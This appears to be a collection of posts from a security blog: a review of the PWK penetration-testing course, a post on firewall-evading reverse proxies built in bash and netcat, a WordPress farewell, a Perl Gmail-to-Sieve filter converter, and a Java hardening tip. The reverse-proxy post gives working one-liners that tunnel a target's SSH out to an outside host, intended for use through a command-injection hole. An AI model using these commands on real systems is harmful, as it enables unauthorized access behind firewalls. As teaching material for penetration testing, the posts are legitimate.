Pentesting With Kali

Review: Penetration Testing With Kali Linux

The web page for the class states “Penetration Testing with Kali Linux is an entry-level course …” For a few years I had ruled out taking the PWB (now PWK) class specifically because of that statement. I was also told on good authority that I would be done with the class in only a few days. I thought, okay, whatever; maybe I'll pick something up, and at least I'll get a few CPEs in the process to feed the other cert that I've bothered to maintain. I came into this class seriously underestimating what it was all about.

So, about the course: the material is good, better than most. You receive a (PDF) book and a series of videos, and you are also provided RDP access to a Windows client in the lab for working on some of the exercises. The exercises are very clear, and if you pay attention and follow along, you will be writing your own exploits from scratch in no time. I was actually surprised at how easy and how clear they made some of the topics. But really, it is very much like any other training class. Until you get to the labs.

The offsec labs really set this course apart. There are many more challenges than I expected. I was anticipating half a dozen, maybe a few more machines to exploit, but no. More. A lot more. Over the course of a few months I compromised more than forty machines in the labs, and I still had more to go. I would have liked to keep going, but I needed to get back to having a life. I liken the offsec labs to the best video game ever. It's addictive; be warned.

Finally, the last part of the course was the certification challenge: twenty-four hours to perform and report on a pen-test of a small network of machines, with no prior knowledge of the challenge. No vulnerability scanners and no autopwn allowed. It was exactly as difficult as I expected; having worked through most of the labs I was ready—very ready—and didn't need the full time allotted. That said, by the time I was done I was tired, and glad that I had started with the hardest challenges and worked towards the easier ones—I was making mistakes by the end that would likely have changed the outcome if I had worked from easy to hard.

Entry-level course? Sort of. The class covers the basics, but getting through the labs requires not just an understanding of the basics, but mastery of them; so yes, the class is entry-level in that sense, but getting root on every machine in the lab is far from basic. My goal was to get everything on the larger “public” network in the labs, and I fell short by one system. Unless you are already very good, and some of the students I met on IRC were, expect to need a lot of lab time. If you are serious about getting the certification, start out with as much lab time as you can afford.

Some Advice For Surviving the Labs

Organization is the key to getting through this course, not only for getting through the work but for the documentation requirement. Keeping all this organized in your head is hard enough; putting it into a report, well, that's where the money is. My advice is to keep good notes. Not just good notes, but print-ready notes. Having notes that are already formatted for your final report will save you hours and hours (days?) of work at the end of the course. I tried many different programs for this, from the suggested KeepNote (great for taking notes, but atrocious for getting them out and into a report) to Evernote and OneNote, and I finally settled on Curio.

Backups are a very good idea. I would suggest going even further and using a full-blown revision control system: git, svn, whatever. Put everything you do related to the course into it. It will be huge, but being able to undo mistakes, or bring up a new Kali image in the cloud and have everything synced up quickly, is worth the trouble.
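
A minimal sketch of that setup with git (the paths and remote URL here are invented for illustration):

# one repository for everything course-related: notes, exploits, screenshots
git init ~/pwk
cd ~/pwk
git add . && git commit -m "lab notes"
# push to a private remote so a fresh machine can clone everything in one step
git remote add origin ssh://user@example.com/srv/git/pwk.git
git push -u origin master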

Running Kali: I tried a lot of different ways of running Kali (local VM, in the cloud) and finally settled on running it on bare metal. I did this because I wanted to be able to work from anywhere: desktop, laptop, work computer, etc., and carrying around my VM on a USB stick isn't great. Running it in the cloud is easy (just install whatever Debian 7 image the provider has, change your repositories, and you have Kali on any VPS hosting provider; see the repository sketch below), but high-memory, powerful-CPU servers are expensive. Bare metal was the best. I set up OpenVPN and X2Go to supplement using SSH with a SOCKS proxy for my browser. X2Go works great, except there is a key-mapping problem when using the Mac client with GNOME; LXDE doesn't have that problem. Fonts look pretty awful by default in Debian, and this carries over to Kali; using X2Go makes it even more obvious, so taking a few extra minutes to set up Infinality for font rendering will make it look nice and smooth. The other trick is to use a tiling terminal: I prefer iTerm2 on my Mac, and Terminator on Linux. Both allow you to set up pre-defined window arrangements, so you can have the same arrangement up and running … ssh'ed in, msfconsole, htop, VPN connection, all ready to go with a couple of clicks. Between X2Go, iTerm2 window sets, and a git repository, I was able to pick up my work from anywhere in just a few minutes.
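
For the cloud route, the repository swap was roughly the following. This is a sketch from the Kali 1.x / Debian 7 era this was written in; check the official Kali documentation for the current repository lines before relying on it:

# as root on the fresh Debian VPS: point apt at the Kali repositories
cat > /etc/apt/sources.list <<EOF
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
EOF
apt-get update && apt-get dist-upgrade -y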

Vulnerability scanners (Nessus, Nexpose, OpenVAS, SAINT, etc.): don't bother. If you want to learn how to use them, the lab isn't a bad place, but you don't gain any advantage by using them in the labs. More likely you will just annoy other students by consuming resources on a lab target they are working on. More than once I had to deal with someone trying to brute-force a login password, which effectively DoS'ed the machine I was working on.

Metasploit … use it. But most importantly, use it correctly. Metasploit is a bit notorious for making complicated exploits and attacks easy. Yes, it does that, but that's not where, in my opinion, it shows its strengths; Metasploit has really transformed pen-testing. Its most important aspects in this class are 1) that it integrates the tools it provides with a database and is a great resource for storing raw information about the attacks, and 2) that it provides so many ancillary tools: encoders, payloads, post-exploitation tools, and pivoting; the pivoting is pretty awesome. There is some confusion among new students working through the labs that Metasploit should be avoided, mostly because there are specific rules of engagement on the exam regarding the scope of its use. Don't be afraid to use it, but anything you use it for you should also be able to perform on your own: pivoting, post-exploitation, etc. That's another philosophical area where I overlapped directly with the offsec course's core tenets … if you are using a tool, you should be able to perform what the tool does without the tool. (I admit, however, that writing my own staged shellcode by hand is a bit beyond my capabilities, so I'm not quite where I'd like to be.)
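
By way of illustration, the database and pivoting features look something like this (the workspace name, addresses, and session number are invented for the example):

# log everything for an engagement into its own workspace, and scan into the db
msfconsole -q -x "workspace -a pwk_labs; db_nmap -sV 10.11.1.5; services"
# later, with a session open, route another subnet through it to pivot:
#   route add 10.11.2.0 255.255.255.0 1    (1 = the session id)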

Exploits: keep track of the exploits you use throughout the course, and manage them in a way that tells you what each one does, where it came from, and what modifications you made. I used a naming scheme like wnt.w2k8-local-2013-2660-edb25912-epathobj-system.cmd.exe. Yes, it's long, but I know the OS, that it's a privilege-escalation exploit, the CVE, where I downloaded it (the Exploit-DB number), and the modifications I made (in this case it's been modified to run cmd.exe using system() instead of the ShellExecute function). Serve these up from your web root so they are easily accessible in the labs (a sketch of this follows below). My advice is to go and download the most popular exploits at the beginning of the course and have them ready for use. There's a number printed between the exploit description and platform on the search results page on exploit-db.com that represents how many times it's been downloaded; that is a good indicator of which exploits are likely to be your best bets.
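
A minimal sketch of that workflow (the filename and addresses are just examples following the scheme above):

# rename the modified exploit per the scheme and drop it into the web root
cp exploit.py /var/www/wxp.w2k3-local-2011-2005-edb18176-afdjoinleaf.py
service apache2 start
# then fetch it from a shell on the target, e.g.:
#   wget http://10.0.0.1/wxp.w2k3-local-2011-2005-edb18176-afdjoinleaf.py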

IRC … as you work through the labs, use the IRC channel. Meet your peers, make some friends, maybe learn a new technique or two.

Wicked Cool Reverse Proxy With Bash and Netcat

There are a lot of guides out there that show how to do various cool tricks using netcat. One thing I recently came across is a situation where I could execute a command on a remote system but had no write permissions to the filesystem. There was a copy of nc on the host, and being an older Unix it had only bash 3 (though this technique also applies to later versions of bash). I put together this technique to get a reverse-proxy connection; I doubt this is anything new, but my searches didn't turn anything up on how to do this, so I figure it's worth sharing.

The goal was to be able to ssh into the machine, which was behind a firewall. It had outbound access on port 80 but was otherwise pretty restricted: no filesystem write access, and an older version of bash (no coprocesses).

FIFO redirection

Just about every example you can find of how to perform a reverse proxy connection with netcat assumes that you can create a Unix FIFO (named pipe). Obviously, this requires creating a file, and without being able to do so it becomes difficult to get all of the IO plumbed correctly.

bash has extensive IO features

One way of dealing with this is to use several features of bash:

  • Un-named pipes (basically everything we are doing here uses an un-named pipe).
  • File descriptors: you are probably familiar with 0, 1, and 2 (STDIN, STDOUT, and STDERR respectively), but bash allows for the creation of additional descriptors, which can be assigned any number above 2.
  • Network file descriptors: bash has a really cool feature where it will treat a network socket as a file descriptor. You just reference the file /dev/tcp/hostname/port; for example, ssh on localhost is /dev/tcp/127.0.0.1/22 (see the quick demo after this list).
  • Process substitution. It's one way (of several) of running subshells without using quotes or backticks (pretty useful for avoiding escaping problems when doing this over HTTP and pushing it through a SQL injection hole).
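
A quick demo of the network descriptors and extra file descriptors together (any reachable TCP service will do; a local web server is assumed for the example):

exec 3<>/dev/tcp/127.0.0.1/80          # fd 3 is now a bidirectional TCP socket
printf 'HEAD / HTTP/1.0\r\n\r\n' >&3   # write a request into the socket
cat <&3                                # read the response back from the same fd
exec 3>&-                              # close the descriptor when done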

How to reverse-proxy a local service without using a named pipe:

If you want to proxy SSH connections from your target using an outbound connection to port 80 on your system, the command is:

nohup bash <(exec 3<>/dev/tcp/localhost/22 && nc 10.0.0.1 80 0<&3 1>&3) &>/dev/null &
  • The <( ) part runs the command in a subprocess; you could accomplish the same using bash -c, backticks, etc.
  • exec 3<>/dev/tcp/localhost/22 creates a bidirectional file descriptor (numbered 3) and associates it with a TCP socket to the local SSH daemon. The extra descriptor is necessary because multiple redirections need to take place within a single command.
  • Then the STDIN and STDOUT of netcat, which connects outbound on port 80, are attached to that descriptor.

And on the local system, you can do this (since we can create named pipes locally, I use one here):

mkfifo catpipe
nc -l -p 80 0<catpipe |nc -l -p 2222 >catpipe

Then you simply ssh to yourself:

ssh -p 2222 user@localhost

Neat trick, eh?

And then I realized …

Netcat isn’t even needed on the remote side! Really, what is netcat but cat with the ability to treat sockets as filehandles? So taking it a step further: a pure bash reverse TCP proxy! It doesn’t need to write to the filesystem, doesn’t use any quotes, and can be fired off as a one-liner.

exec 3<>/dev/tcp/localhost/22 && exec 4<>/dev/tcp/10.0.0.1/80 && \
  bash <(cat 0<&3 1>&4 & ) && cat 0<&4 1>&3

Note: the line break here is added for readability, but this would be a one-liner during the attack. And if you need to disassociate from the process that called the command (say the web server, or whatever, has a low command timeout), here it is again with nohup and no line breaks:

nohup bash <( exec 3<>/dev/tcp/localhost/22 && exec 4<>/dev/tcp/10.0.0.1/80 && bash <(cat 0<&3 1>&4 & ) && cat 0<&4 1>&3 ) &>/dev/null &

The first cat statement needs to be put in the background (the second doesn’t necessarily, but if we background it too we don’t run into any syntax problems with the ampersand). I’m doing this as a one-liner (using logical ANDs to string it all together), so I run it as a subprocess and put it in the background within the subprocess. If you can provide multiple commands, then it gets easier.
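
For instance, given an interactive shell where commands can be issued one at a time, the same proxy unrolls to this (same example addresses as above):

exec 3<>/dev/tcp/localhost/22   # socket to the local SSH daemon
exec 4<>/dev/tcp/10.0.0.1/80    # outbound socket to the listener on port 80
cat 0<&3 1>&4 &                 # shuttle one direction in the background
cat 0<&4 1>&3                   # and the other direction in the foreground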

I love unix.

zsh seems to have the same abilities (filehandles and TCP file descriptors).

Goodbye Wordpress

Everything old is new.

Technology trends are cyclic, and sometimes we backtrack to ideas from the past that have fallen out of favor. Static site generators are a good example. They are starting to gain popularity again; the difference is that 10 years ago most sucked and looked pretty awful. (Also ironic is the trend of many sites returning to single-column text and minimal formatting, though of course the fonts and layouts are nicer than what we had in the mid-90s.) I’ve decided to jump on the bandwagon too. I’m tired of dealing with scores of automated attacks, maintaining databases, PHP, blah blah blah … all for a site that 1) generates no revenue, 2) only has a few thousand visitors a month, and 3) I don’t contribute to on a regular basis.

I also made a few decisions based on the traffic I receive. Almost all of my visitors land from a search engine, are only interested in one topic, and then move on. So really, why clutter up the interface with navigation and other nonsense that’s difficult to cull from a WordPress theme?

I am also ditching comments, for a few reasons. Keeping spam out of the comments meant requiring every comment to be approved (despite some very capable plugins that caught most of the junk), and I really wanted to remove all server-side processing from the site. Sure, there’s Disqus, but let’s be honest about what the internet has become … when a service on the Internet is free, you are the product. How does Disqus make money? By tracking the visitors to websites that have it embedded, and selling that information to advertisers. It’s the same annoyance I have with most social sites.

So, I am trying out Octopress. In terms of how difficult it is to use, it’s definitely more complex, but it drastically simplifies the maintenance of having a blog. I am no longer saddled with a database, frequently checking for security updates, worrying about plugins getting out of date, putting a caching layer in front of what is essentially static content, or scripting backups. I can use simple tools (vim, git, and ssh) to do most of the work, and I can free up memory on my VPS for other things I think are more important.

I’ll follow up with another post on where I ended up with my WordPress configuration, with a few tips on adding extra layers of security. There are some effective tricks I learned for locking it down that will be useful to others.

Moving Off of Gmail? What About All Those Filter Rules?

So, for one reason or another, I decided that I was going to move away from Gmail. It’s easy to underestimate the massive pain that is running a mail server, especially if you expect anti-spam, anti-virus, and the thousand (seemingly so, at least) other features offered for free by most webmail providers. There’s a good chance that people doing the same thing (abandoning Gmail, that is) will eventually decide that Dovecot and Sieve will feature heavily in whatever setup they land on. And if they are anything like me, they filter a significant portion of their mail into Gmail’s equivalent of IMAP folders (labels). In my case, I didn’t want to recreate all of these rules by hand (despite the probability that most of them are stale). Fortunately, Google allows the rules to be exported as XML (though actual Sieve rules would have been better!). A quick search didn’t turn up any tools to convert from one to the other, so I threw together an (admittedly poorly written) Perl script. And to think, I had promised to stop using Perl and move to Ruby for one-off little scripts like this; perhaps a decent New Year’s resolution?
googleMailFilters.pl:
#!/usr/bin/perl
use strict;
use warnings;
use XML::Simple;

# Read the Gmail filter export (saved as mailFilters.xml).
my $xml  = XML::Simple->new;
my $data = $xml->XMLin("mailFilters.xml");

# Build a hash of arrays per header type (from, to, subject), keyed by the
# destination label, with the strings to match as the array values.
my %rules = ( from => {}, to => {}, subject => {} );
foreach my $filter ( keys %{ $data->{entry} } ) {
    my $props = $data->{entry}->{$filter}->{"apps:property"};
    my $label = $props->{label}->{value};
    next unless defined $label && length $label;
    foreach my $field ( keys %rules ) {
        my $value = $props->{$field}->{value};
        push @{ $rules{$field}{$label} }, $value
            if defined $value && length $value;
    }
}

# Print out Sieve rules from our hashes.
print "require [\"fileinto\"];\n";
foreach my $field ( sort keys %rules ) {
    my $header = ucfirst $field;    # From, To, Subject
    foreach my $label ( sort keys %{ $rules{$field} } ) {
        print "\n# rule:[$field-$label]\n";
        print "if anyof (";
        print join( ",\n\t",
            map { "header :contains \"$header\" \"$_\"" }
            @{ $rules{$field}{$label} } );
        print " )\n\t{\n\t\tfileinto \"$label\";\n\t}\n";
    }
}
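
To use it (assuming the exported XML has been saved next to the script as mailFilters.xml, which is the filename the script expects):

perl googleMailFilters.pl > converted.sieve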

Making Java (Slightly) Safer on Windows

Here’s a suggestion that can make it a little safer to run the Java plugin in your web browser on Windows (Vista, Win 7, and Win 8, but not XP). This doesn’t stop exploits, and is probably not entirely effective, but it can stop some bad things from happening. Don’t be fooled into feeling safe by doing this; it’s just one additional layer, but it could stop your system from being fully compromised.

Windows includes a feature called mandatory integrity controls that imposes an extra layer of protection on top of the discretionary access controls provided by the operating system. It is a (very) simple method of preventing write access to items with a higher integrity label. There are several levels defined: Anonymous, Low, Medium, High, and System. Mandatory integrity controls are one of the many features that make Google Chrome’s sandbox possible.

One of the first things many Java exploits do is grab a dropper, save it to the filesystem, and execute it. In most cases, running Java with low integrity will short-circuit the download (though this is easy for malware authors to work around). Also important is that child processes inherit the integrity label, so if the malware was smart enough to drop the bot or whatever it grabbed into a location with a “low” label, the bot will execute with low permissions. This will stop it from being persistent, writing to browser settings, copying itself to system folders, and so on.

The downsides? The “Low” label still allows reading of files and information labeled “Medium” or higher, relying on discretionary access controls. Another downside is that this will probably break any complex Java applet. I was still able to run most of the stuff I came across; it’s just when trying to write files that things get denied. Also, you probably don’t want to change the java.exe program itself if you use any Java applications, but this isn’t really a problem, because Internet Explorer uses a helper executable, jp2launcher.exe, to launch the plugin, and as mentioned before the “Low” label is inherited on execution.

Here’s how to run the Java browser plugin as Low integrity:
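
A minimal sketch of the idea using icacls (the JRE path varies by version and install; adjust to match yours):

:: from an elevated command prompt, tag the plugin launcher as Low integrity
icacls "C:\Program Files\Java\jre7\bin\jp2launcher.exe" /setintegritylevel Low
:: list the ACL again to verify the mandatory label was applied
icacls "C:\Program Files\Java\jre7\bin\jp2launcher.exe"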